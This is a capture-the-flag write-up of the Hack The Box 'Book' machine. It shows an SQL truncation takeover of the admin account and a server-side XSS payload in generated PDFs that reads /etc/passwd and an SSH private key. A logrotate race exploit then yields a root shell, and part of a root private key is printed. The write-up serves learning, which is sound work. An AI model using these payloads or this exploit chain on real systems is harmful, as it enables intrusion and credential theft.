Book - K3nX

  • Book is Medium Linux Machine and IP address is 10.10.10.176
    Sample Image

    Nmap

    #nmap -sSV -O -A -T4 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.95s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/26%OT=22%CT=1%CU=33576%PV=Y%DS=2%DC=T%G=Y%TM=5EA587D
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
OS:1NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   805.67 ms 10.10.16.1
2   396.16 ms 10.10.10.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.98 seconds

    Nmap Result Show Only Port 80 (Apache httpd) and Port 22 (SSH) are open

    Web Enumeration

    • Nmap result show port 80 is open let check this, I found this webpage and if you try to access this web page you can find this sign in form
      Sample Image

    • I used gobuster to find some dir , I found many dir but i found nothing interesting

    • In this time, I checked source code I found one interesting in source code Sample Image

    • It's look like there is a limit on the name and email fields , I create an account and see the web page from the inside . I found several interesting parts , this is "Contact Us".
      Sample Image

    • In this webpage , I found admin email , admin@book.htb

    • In Previous , I know the limit on the email field , I think it's may be SQL Truncation attack

      SQL Truncation

    • This SQL truncation attack is based on the behaviour of the server when managing special characters like spaces. In this case if you send as email "admin@book.htb a" (notice the spaces and the fact the string email length is less than 20), the database is going to check if any user already has the email "admin@book.htb a", and, if no-one has it, it is going to cut the username (up to the max 20chars allowed), delete the spaces (MySQL behaviour) and save a new entry with it.

    • You can easily change the password of the admin user with this way

    • I changed admin as admin password
      Sample Image

      • XSS to Local File Read

    • Now I get admin access

      • Sample Image

    • I found one interesting this is Collection

      Sample Image

    • I think Those PDF links will download a PDF with the name of the Users or with the name of the Collections

    • This PDF is dynamically creted , we can control the part of input
      I think this may be perform Server Side XSS (Dynamic PDF)

      • XSS to Local File Read
      Server Side XSS

    • This is My Payload

      • 
#< script>x=new
XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();< /script>

    • Upload the payload in the both field of book and author and select any file to upload
      Sample Image

    • After uploading , you can download file on admin panel Collection

    • I got the pdf with this /etc/passwd contents Sample Image

    User

    • I found user is reader , We need to try /home/reader/.ssh/id_rsa

    • I changed /home/reader/.ssh/id_rsa instead of /etc/passwd in previous XSS Payload

    • After uploading and download this pdf , I got reader ssh key
      Sample Image

    • I login with this id_rsa , I got user and user.txt Sample Image

    Privilege Escalation to root

    • I spend a few time on this but i can't found nothing , In this time my friend said check process

    • I upload pspy and i checked some processes. In this time,I found one this is logrotate service

    • This Logrotate service is running as root , I searched on google and found an exploit on github

      • Logrotten
    • I used python simple http server to transfer logrotten.c file and nc
      complie this logrotten.c with gcc
      • Sample Image
    • Now need to run logrotten
      • reader@book:/tmp$ ./logrotten -p ./payload /home/reader/backups/access.log
    • we need to write into the access.log the log is got rotated
      • 
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
reader@book:~/backups$ echo "test" >> access.log
    • Need to try multiple time to run logrotten and write into the access log
    • After running multiple time , I got a shell on my ncat listener
      • 
[root@arch ~/Desktop/htb/Machines/book]# nc -lvnp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.176] 50008
# cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsxp94IilXDxbAhMRD2PsQQ46mGrvgSPUh26lCETrWcIdNU6J
cFzQxCMM/E8UwLdD0fzUJtDgo4SUuwUmkPc6FXuLrZ+xqJaKoeu7/3WgjNBnRc7E
z6kgpwnf4GOqpvxx1R1W+atbMkkWn6Ne89ogCUarJFVMEszzuC+14Id83wWSc8uV
ZfwOR1y/Xqdu82HwoAMD3QG/gu6jER8V7zsC0ByAyTLT7VujBAP9USfqOeqza2UN
GWUqIckZ2ITbChBuTeahfH2Oni7Z3q2wXzn/0yubA8BpyzVut4Xy6ZgjpH6tlwQG
BEbULdw9d/E0ZFHN4MoNWuKtybx4iVMTBcZcyQIDAQABAoIBAQCgBcxwIEb2qSp7
KQP2J0ZAPfFWmzzQum26b75eLA3HzasBJOGhlhwlElgY2qNlKJkc9nOrFrePAfdN
PeXeYjXwWclL4MIAKjlFQPVg4v0Gs3GCKqMoEymMdUMlHoer2SPv0N4UBuldfXYM
PhCpebtj7lMdDGUC60Ha0C4FpaiJLdbpfxHase/uHvp3S/x1oMyLwMOOSOoRZZ2B
Ap+fnQEvGmp7QwfH+cJT8ggncyN+Gc17NwXrqvWhkIGnf7Bh+stJeE/sKsvG83Bi
    • I tried first to get root id_rsa file for ssh access
    • After getting root id_rsa file and I tried ssh login with this file
    • SSH Login Successful and I got root access and root.txt
      • Sample Image
    • Finally Owned this machine
    • I hope you enjoy this
    • Hope you learned something :)
      •